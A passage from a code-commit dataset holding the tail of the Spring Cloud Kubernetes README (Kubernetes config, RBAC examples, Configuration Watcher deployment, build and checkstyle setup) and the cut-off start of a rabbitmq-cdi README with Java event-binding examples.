may lead to unexpected results.\n* Deleting a property or the whole config map does not restore the original state of the beans when you use the `refresh` level.\n\n== Kubernetes Ecosystem Awareness\n\nAll of the features described earlier in this guide work equally well, regardless of whether your application is running inside\nKubernetes. This is really helpful for development and troubleshooting.\nFrom a development point of view, this lets you start your Spring Boot application and debug one\nof the modules that is part of this project. You need not deploy it in Kubernetes,\nas the code of the project relies on the\nhttps:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java client], which is a fluent DSL that can\ncommunicate by using `http` protocol to the REST API of the Kubernetes Server.\n\nTo disable the integration with Kubernetes you can set `spring.cloud.kubernetes.enabled` to `false`. Please be aware that when `spring-cloud-kubernetes-config` is on the classpath,\n`spring.cloud.kubernetes.enabled` should be set in `bootstrap.{properties|yml}` (or the profile specific one) otherwise it should be in `application.{properties|yml}` (or the profile specific one).\nAlso note that these properties: `spring.cloud.kubernetes.config.enabled` and `spring.cloud.kubernetes.secrets.enabled` only take effect when set in `bootstrap.{properties|yml}`\n\n=== Kubernetes Profile Autoconfiguration\n\nWhen the application runs as a pod inside Kubernetes, a Spring profile named `kubernetes` automatically gets activated.\nThis lets you customize the configuration, to define beans that are applied when the Spring Boot application is deployed\nwithin the Kubernetes platform (for example, different development and production configuration).\n\n=== Istio Awareness\n\nWhen you include the `spring-cloud-kubernetes-istio` module in the application classpath, a new profile is added to the application,\nprovided the application is running inside a Kubernetes Cluster with https:\/\/istio.io[Istio] installed. You can then use\nspring `@Profile(\"istio\")` annotations in your Beans and `@Configuration` classes.\n\nThe Istio awareness module uses `me.snowdrop:istio-client` to interact with Istio APIs, letting us discover traffic rules, circuit breakers, and so on,\nmaking it easy for our Spring Boot applications to consume this data to dynamically configure themselves according to the environment.\n\n== Pod Health Indicator\n\nSpring Boot uses https:\/\/github.com\/spring-projects\/spring-boot\/blob\/master\/spring-boot-project\/spring-boot-actuator\/src\/main\/java\/org\/springframework\/boot\/actuate\/health\/HealthEndpoint.java[`HealthIndicator`] to expose info about the health of an application.\nThat makes it really useful for exposing health-related information to the user and makes it a good fit for use as https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[readiness probes].\n\nThe Kubernetes health indicator (which is part of the core module) exposes the following info:\n\n* Pod name, IP address, namespace, service account, node name, and its IP address\n* A flag that indicates whether the Spring Boot application is internal or external to Kubernetes\n\n== Info Contributor\n\nSpring Cloud Kubernetes includes an `InfoContributor` which adds Pod information to\nSpring Boot's `\/info` Acturator endpoint.\n\nYou can disable this `InfoContributor` by setting `management.info.kubernetes.enabled`\nto `false` in `bootstrap.[properties | yaml]`.\n\n== Leader Election\n\n<TBD>\n\n== LoadBalancer for Kubernetes\nThis project includes Spring Cloud Load Balancer for load balancing based on Kubernetes Endpoints and provides implementation of load balancer based on Kubernetes Service.\nTo include it to your project add the following dependency.\n====\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable load balancing based on Kubernetes Service name use the following property. Then load balancer would try to call application using address, for example `service-a.default.svc.cluster.local`\n====\n[source]\n----\nspring.cloud.kubernetes.loadbalancer.mode=SERVICE\n----\n====\n\nTo enabled load balancing across all namespaces use the following property. Property from `spring-cloud-kubernetes-discovery` module is respected.\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\n== Security Configurations Inside Kubernetes\n\n\n=== Namespace\n\nMost of the components provided in this project need to know the namespace. For Kubernetes (1.3+), the namespace is made available to the pod as part of the service account secret and is automatically detected by the client.\nFor earlier versions, it needs to be specified as an environment variable to the pod. A quick way to do this is as follows:\n\n====\n[source]\n----\n env:\n - name: \"KUBERNETES_NAMESPACE\"\n valueFrom:\n fieldRef:\n fieldPath: \"metadata.namespace\"\n----\n====\n\n=== Service Account\n\nFor distributions of Kubernetes that support more fine-grained role-based access within the cluster, you need to make sure a pod that runs with `spring-cloud-kubernetes` has access to the Kubernetes API.\nFor any service accounts you assign to a deployment or pod, you need to make sure they have the correct roles.\n\nDepending on the requirements, you'll need `get`, `list` and `watch` permission on the following resources:\n\n.Kubernetes Resource Permissions\n|===\n|Dependency | Resources\n\n\n|spring-cloud-starter-kubernetes\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-config\n|configmaps, secrets\n|===\n\nFor development purposes, you can add `cluster-reader` permissions to your `default` service account. On a production system you'll likely want to provide more granular permissions.\n\nThe following Role and RoleBinding are an example for namespaced permissions for the `default` account:\n\n====\n[source,yaml]\n----\nkind: Role\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n namespace: YOUR-NAME-SPACE\n name: namespace-reader\nrules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n\n---\n\nkind: RoleBinding\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n name: namespace-reader-binding\n namespace: YOUR-NAME-SPACE\nsubjects:\n- kind: ServiceAccount\n name: default\n apiGroup: \"\"\nroleRef:\n kind: Role\n name: namespace-reader\n apiGroup: \"\"\n----\n====\n\n== Service Registry Implementation\n\nIn Kubernetes service registration is controlled by the platform, the application itself does not control\nregistration as it may do in other platforms. For this reason using `spring.cloud.service-registry.auto-registration.enabled`\nor setting `@EnableDiscoveryClient(autoRegister=false)` will have no effect in Spring Cloud Kubernetes.\n\n[#spring-cloud-kubernetes-configuration-watcher]\n## Spring Cloud Kubernetes Configuration Watcher\n\nKubernetes provides the ability to https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#add-configmap-data-to-a-volume[mount a ConfigMap or Secret as a volume]\nin the container of your application. When the contents of the ConfigMap or Secret changes, the https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#mounted-configmaps-are-updated-automatically[mounted volume will be updated with those changes].\n\nHowever, Spring Boot will not automatically update those changes unless you restart the application. Spring Cloud\nprovides the ability refresh the application context without restarting the application by either hitting the\nactuator endpoint `\/refresh` or via publishing a `RefreshRemoteApplicationEvent` using Spring Cloud Bus.\n\nTo achieve this configuration refresh of a Spring Cloud app running on Kubernetes, you can deploy the Spring Cloud\nKubernetes Configuration Watcher controller into your Kubernetes cluster.\n\nThe application is published as a container and is available on https:\/\/hub.docker.com\/repository\/docker\/springcloud\/spring-cloud-kubernetes-configuration-watcher[Docker Hub].\n\nSpring Cloud Kubernetes Configuration Watcher can send refresh notifications to applications in two ways.\n\n1. Over HTTP in which case the application being notified must of the `\/refresh` actuator endpoint exposed and accessible from within the cluster\n2. Using Spring Cloud Bus, in which case you will need a message broker deployed to your custer for the application to use.\n\n### Deployment YAML\n\nBelow is a sample deployment YAML you can use to deploy the Kubernetes Configuration Watcher to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n spec:\n ports:\n - name: http\n port: 8888\n targetPort: 8888\n selector:\n app: spring-cloud-kubernetes-configuration-watcher\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-configuration-watcher-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-configuration-watcher\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n spec:\n serviceAccount: spring-cloud-kubernetes-configuration-watcher\n containers:\n - name: spring-cloud-kubernetes-configuration-watcher\n image: springcloud\/spring-cloud-kubernetes-configuration-watcher:2.0.0-SNAPSHOT\n imagePullPolicy: IfNotPresent\n readinessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8888\n\n----\n====\n\nThe Service Account and associated Role Binding is important for Spring Cloud Kubernetes Configuration to work properly.\nThe controller needs access to read data about ConfigMaps, Pods, Services, Endpoints and Secrets in the Kubernetes cluster.\n\n### Monitoring ConfigMaps and Secrets\n\nSpring Cloud Kubernetes Configuration Watcher will react to changes in ConfigMaps with a label of `spring.cloud.kubernetes.config` with the value `true`\nor any Secret with a label of `spring.cloud.kubernetes.secret` with the value `true`. If the ConfigMap or Secret does not have either of those labels\nor the values of those labels is not `true` then any changes will be ignored.\n\nThe labels Spring Cloud Kubernetes Configuration Watcher looks for on ConfigMaps and Secrets can be changed by setting\n`spring.cloud.kubernetes.configuration.watcher.configLabel` and `spring.cloud.kubernetes.configuration.watcher.secretLabel` respectively.\n\nIf a change is made to a ConfigMap or Secret with valid labels then Spring Cloud Kubernetes Configuration Watcher will take the name of the ConfigMap or Secret\nand send a notification to the application with that name.\n\n### HTTP Implementation\n\nThe HTTP implementation is what is used by default. When this implementation is used Spring Cloud Kubernetes Configuration Watcher and a\nchange to a ConfigMap or Secret occurs then the HTTP implementation will use the Spring Cloud Kubernetes Discovery Client to fetch all\ninstances of the application which match the name of the ConfigMap or Secret and send an HTTP POST request to the application's actuator\n`\/refresh` endpoint. By default it will send the post request to `\/actuator\/refresh` using the port registered in the discovery client.\n\n#### Non-Default Management Port and Actuator Path\n\nIf the application is using a non-default actuator path and\/or using a different port for the management endpoints, the Kubernetes service for the application\ncan add an annotation called `boot.spring.io\/actuator` and set its value to the path and port used by the application. For example\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n labels:\n app: config-map-demo\n name: config-map-demo\n annotations:\n boot.spring.io\/actuator: http:\/\/:9090\/myactuator\/home\nspec:\n ports:\n - name: http\n port: 8080\n targetPort: 8080\n selector:\n app: config-map-demo\n----\n====\n\n\nAnother way you can choose to configure the actuator path and\/or management port is by setting\n`spring.cloud.kubernetes.configuration.watcher.actuatorPath` and `spring.cloud.kubernetes.configuration.watcher.actuatorPort`.\n\n### Messaging Implementation\n\nThe messaging implementation can be enabled by setting profile to either `bus-amqp` (RabbitMQ) or `bus-kafka` (Kafka) when the Spring Cloud Kubernetes Configuration Watcher\napplication is deployed to Kubernetes.\n\n### Configuring RabbitMQ\n\nWhen the `bus-amqp` profile is enabled you will need to configure Spring RabbitMQ to point it to the location of the RabbitMQ\ninstance you would like to use as well as any credentials necessary to authenticate. This can be done\nby setting the standard Spring RabbitMQ properties, for example\n\n====\n[source,yaml]\n----\nspring:\n rabbitmq:\n username: user\n password: password\n host: rabbitmq\n----\n====\n\n### Configuring Kafka\n\nWhen the `bus-kafka` profile is enabled you will need to configure Spring Kafka to point it to the location of the Kafka Broker\ninstance you would like to use. This can be done by setting the standard Spring Kafka properties, for example\n\n====\n[source,yaml]\n----\nspring:\n kafka:\n producer:\n bootstrap-servers: localhost:9092\n----\n====\n\n== Examples\n\nSpring Cloud Kubernetes tries to make it transparent for your applications to consume Kubernetes Native Services by\nfollowing the Spring Cloud interfaces.\n\nIn your applications, you need to add the `spring-cloud-kubernetes-discovery` dependency to your classpath and remove any other dependency that contains a `DiscoveryClient` implementation (that is, a Eureka discovery client).\nThe same applies for `PropertySourceLocator`, where you need to add to the classpath the `spring-cloud-kubernetes-config` and remove any other dependency that contains a `PropertySourceLocator` implementation (that is, a configuration server client).\n\nThe following projects highlight the usage of these dependencies and demonstrate how you can use these libraries from any Spring Boot application:\n\n* https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-examples[Spring Cloud Kubernetes Examples]: the ones located inside this repository.\n* Spring Cloud Kubernetes Full Example: Minions and Boss\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-minion[Minion]\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-boss[Boss]\n* Spring Cloud Kubernetes Full Example: https:\/\/github.com\/salaboy\/s1p_docs[SpringOne Platform Tickets Service]\n* https:\/\/github.com\/salaboy\/s1p_gateway[Spring Cloud Gateway with Spring Cloud Kubernetes Discovery and Config]\n* https:\/\/github.com\/salaboy\/showcase-admin-tool[Spring Boot Admin with Spring Cloud Kubernetes Discovery and Config]\n\n== Other Resources\n\nThis section lists other resources, such as presentations (slides) and videos about Spring Cloud Kubernetes.\n\n* https:\/\/salaboy.com\/2018\/09\/27\/the-s1p-experience\/[S1P Spring Cloud on PKS]\n* https:\/\/salaboy.com\/2018\/07\/18\/ljc-july-18-spring-cloud-docker-k8s\/[Spring Cloud, Docker, Kubernetes -> London Java Community July 2018]\n\n\nPlease feel free to submit other resources through pull requests to https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes[this repository].\n\n== Configuration properties\n\nTo see the list of all Sleuth related configuration properties please check link:appendix.html[the Appendix page].\n\n== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. There should be a \"script\" and maybe \"install\" command. Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttps:\/\/docs.docker.com\/compose\/[Docker Compose] to run the middeware servers\nin Docker containers. See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttps:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttps:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttps:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Activate the Spring Maven profile\nSpring Cloud projects require the 'spring' Maven profile to be activated to resolve\nthe spring milestone and snapshot repositories. Use your preferred IDE to set this\nprofile to be active, or you may experience build errors.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the https:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\n:spring-cloud-build-branch: master\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/cla.pivotal.io\/sign\/spring[Contributor License Agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n https:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow https:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).\n\n=== Checkstyle\n\nSpring Cloud Build comes with a set of checkstyle rules. You can find them in the `spring-cloud-build-tools` module. The most notable files under the module are:\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u2514\u2500\u2500 checkstyle.xml <1>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n\n==== Checkstyle configuration\n\nCheckstyle rules are *disabled by default*. To add checkstyle to your project just define the following properties and plugins.\n\n.pom.xml\n----\n<properties>\n<maven-checkstyle-plugin.failsOnError>true<\/maven-checkstyle-plugin.failsOnError> <1>\n <maven-checkstyle-plugin.failsOnViolation>true\n <\/maven-checkstyle-plugin.failsOnViolation> <2>\n <maven-checkstyle-plugin.includeTestSourceDirectory>true\n <\/maven-checkstyle-plugin.includeTestSourceDirectory> <3>\n<\/properties>\n\n<build>\n <plugins>\n <plugin> <4>\n <groupId>io.spring.javaformat<\/groupId>\n <artifactId>spring-javaformat-maven-plugin<\/artifactId>\n <\/plugin>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n\n <reporting>\n <plugins>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n <\/reporting>\n<\/build>\n----\n<1> Fails the build upon Checkstyle errors\n<2> Fails the build upon Checkstyle violations\n<3> Checkstyle analyzes also the test sources\n<4> Add the Spring Java Format plugin that will reformat your code to pass most of the Checkstyle formatting rules\n<5> Add checkstyle plugin to your build and reporting phases\n\nIf you need to suppress some rules (e.g. line length needs to be longer), then it's enough for you to define a file under `${project.root}\/src\/checkstyle\/checkstyle-suppressions.xml` with your suppressions. Example:\n\n.projectRoot\/src\/checkstyle\/checkstyle-suppresions.xml\n----\n<?xml version=\"1.0\"?>\n<!DOCTYPE suppressions PUBLIC\n\t\t\"-\/\/Puppy Crawl\/\/DTD Suppressions 1.1\/\/EN\"\n\t\t\"https:\/\/www.puppycrawl.com\/dtds\/suppressions_1_1.dtd\">\n<suppressions>\n\t<suppress files=\".*ConfigServerApplication\\.java\" checks=\"HideUtilityClassConstructor\"\/>\n\t<suppress files=\".*ConfigClientWatch\\.java\" checks=\"LineLengthCheck\"\/>\n<\/suppressions>\n----\n\nIt's advisable to copy the `${spring-cloud-build.rootFolder}\/.editorconfig` and `${spring-cloud-build.rootFolder}\/.springformat` to your project. That way, some default formatting rules will be applied. You can do so by running this script:\n\n```bash\n$ curl https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/.editorconfig -o .editorconfig\n$ touch .springformat\n```\n\n=== IDE setup\n\n==== Intellij IDEA\n\nIn order to setup Intellij you should import our coding conventions, inspection profiles and set up the checkstyle plugin.\nThe following files can be found in the https:\/\/github.com\/spring-cloud\/spring-cloud-build\/tree\/master\/spring-cloud-build-tools[Spring Cloud Build] project.\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle.xml <1>\n \u00a0\u00a0 \u2514\u2500\u2500 intellij\n \u00a0\u00a0 \u00a0\u00a0 \u251c\u2500\u2500 Intellij_Project_Defaults.xml <4>\n \u00a0\u00a0 \u00a0\u00a0 \u2514\u2500\u2500 Intellij_Spring_Boot_Java_Conventions.xml <5>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n<4> Project defaults for Intellij that apply most of Checkstyle rules\n<5> Project style conventions for Intellij that apply most of Checkstyle rules\n\n.Code style\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-code-style.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Code style`. There click on the icon next to the `Scheme` section. There, click on the `Import Scheme` value and pick the `Intellij IDEA code style XML` option. Import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Spring_Boot_Java_Conventions.xml` file.\n\n.Inspection profiles\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-inspections.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Inspections`. There click on the icon next to the `Profile` section. There, click on the `Import Profile` and import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Project_Defaults.xml` file.\n\n.Checkstyle\n\nTo have Intellij work with Checkstyle, you have to install the `Checkstyle` plugin. It's advisable to also install the `Assertions2Assertj` to automatically convert the JUnit assertions\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-checkstyle.png[Checkstyle]\n\nGo to `File` -> `Settings` -> `Other settings` -> `Checkstyle`. There click on the `+` icon in the `Configuration file` section. There, you'll have to define where the checkstyle rules should be picked from. In the image above, we've picked the rules from the cloned Spring Cloud Build repository. However, you can point to the Spring Cloud Build's GitHub repository (e.g. for the `checkstyle.xml` : `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle.xml`). We need to provide the following variables:\n\n- `checkstyle.header.file` - please point it to the Spring Cloud Build's, `spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` URL.\n- `checkstyle.suppressions.file` - default suppressions. Please point it to the Spring Cloud Build's, `spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` URL.\n- `checkstyle.additional.suppressions.file` - this variable corresponds to suppressions in your local project. E.g. you're working on `spring-cloud-contract`. Then point to the `project-root\/src\/checkstyle\/checkstyle-suppressions.xml` folder. Example for `spring-cloud-contract` would be: `\/home\/username\/spring-cloud-contract\/src\/checkstyle\/checkstyle-suppressions.xml`.\n\nIMPORTANT: Remember to set the `Scan Scope` to `All sources` since we apply checkstyle rules for production and test sources.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44de5d63a70d893f2e2408d6f13567798c8a7177","subject":"Adds link to maven central","message":"Adds link to maven central","repos":"reinhapa\/rabbitmq-cdi","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Provides a JavaEE Event <--> RabbitMQ bridge.\nPatrick Reinhart <https:\/\/github.com\/reinhapa[@reinhapa]>\n:project-name: rabbitmq-cdi\n:group-name: net.reini\n:project-full-path: reinhapa\/{project-name}\n:github-branch: master\n\nimage:https:\/\/img.shields.io\/badge\/license-MIT-blue.svg[\"MIT License\", link=\"https:\/\/github.com\/{project-full-path}\/blob\/{github-branch}\/LICENSE\"]\nimage:https:\/\/img.shields.io\/badge\/Java-8-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-9-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-10-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-11-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-12-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/github\/release\/{project-full-path}.svg[\"Release\", link=\"https:\/\/github.com\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/maven-central\/v\/{group-name}\/{project-name}.svg?label=Maven%20Central[\"Maven Central\", link=\"https:\/\/search.maven.org\/search?q=g:%22{group-name}%22%20AND%20a:%22{project-name}%22\"]\nimage:https:\/\/img.shields.io\/travis\/{project-full-path}\/{github-branch}.svg[\"Build Status\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/codecov\/c\/github\/{project-full-path}\/{github-branch}.svg[\"Code Coverage\", link=\"https:\/\/codecov.io\/github\/{project-full-path}?branch={github-branch}\"]\nimage:https:\/\/codecov.io\/github\/{project-full-path}\/branch.svg?branch={github-branch}[codecov.io]\n\nThis project contains all needed classes to bind JavaEE enterprise events to a\nRabbitMQ exchange for outgoing events. Inbound events can also be bound to the\nrespective queues and will be handed over to all JavaEE event observers.\n\nThe RabbitMQ message content is done via JSON serialization of a Java Bean \ncompatible PoJo object and vice versa.\n\n== Usage example\n\nFirst you need to define event objects using standard Java Bean syntax:\n\n[source,java]\n----\npublic class EventOne {\n private boolean enabled;\n\n public boolean isEnabled() {\n return enabled;\n }\n\n public void setEnabled(boolean enabled) {\n this.enabled = enabled;\n }\n}\n\npublic class EventTwo {\n private String value;\n\n public String getValue() {\n return value;\n }\n\n public void setValue(String value) {\n this.value = value;\n }\n}\n----\n\n\nAs second step you have to define the bindings:\n\n[source,java]\n----\n@Dependent\npublic class RabbitBinder extends EventBinder {\n @Override\n protected void bindEvents() {\n\n ExchangeDeclaration testExchangeOne = declarerFactory()\n .createExchangeDeclaration(\"test.exchange.one\")\n .withExchangeType(BuiltinExchangeType.DIRECT)\n .withAutoDelete(false)\n .withDurable(false); \/\/ <1>\n\n QueueDeclaration testQueue = declarerFactory()\n .createQueueDeclaration(\"test.queue\")\n .withAutoDelete(false)\n .withDurable(false)\n .withExclusiveAccess(false); \/\/ <2>\n\n bind(EventOne.class)\n .toExchange(\"test.exchange.one\");\n .withDeclaration(testExchangeOne) \/\/ 